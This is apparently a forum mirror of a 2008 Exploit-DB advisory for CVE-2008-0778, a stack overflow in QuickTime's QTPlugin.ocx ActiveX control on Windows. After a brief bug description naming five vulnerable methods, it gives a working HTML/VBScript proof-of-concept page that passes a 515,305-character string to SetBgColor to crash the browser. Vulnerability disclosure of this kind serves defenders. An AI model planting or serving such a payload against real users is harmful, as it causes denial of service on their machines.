- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5110
- Проверка EDB
-
- Пройдено
- Автор
- LAURENT GAFFIé
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2008-0778
- Дата публикации
- 2008-02-13
Код:
Application: QuickTime <= 7.4.1 QTPlugin.ocx Multiple Remote Stack Overflow
Web Site: http://www.apple.com/fr/quicktime/download/
Platform: Windows
Bug: Multiple Remote Stack Overflow
-------------------------------------------------------
1) Introduction
2) Bug
3) Proof of concept
4) Credits
===========
1) Introduction
===========
A nice introduction to Quicktime Player can be found here : http://www.apple.com/quicktime/player/
======
2) Bug
======
Stack Overflow/Denial of service occurs when supplying a long string to theses functions:
-SetBgColor
-SetHREF
-SetMovieName
-SetTarget
-SetMatrix
=====
3)Proof of concept
=====
Proof of concept example [works with the others functions supplyed in section 2) ] :
<html>
<object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' id='foo' ></object>
<input type="button" value="Hit me" language="VBScript" OnClick="test()">
<script language="VBScript">
sub test()
bar = String(515305, "A")
foo.SetBgColor bar
End Sub
</script>
</html>
=====
5)Credits
=====
laurent gaffié
laurent.gaffie{remove_this}[at]gmail[dot]com
# milw0rm.com [2008-02-13]- Источник
- www.exploit-db.com
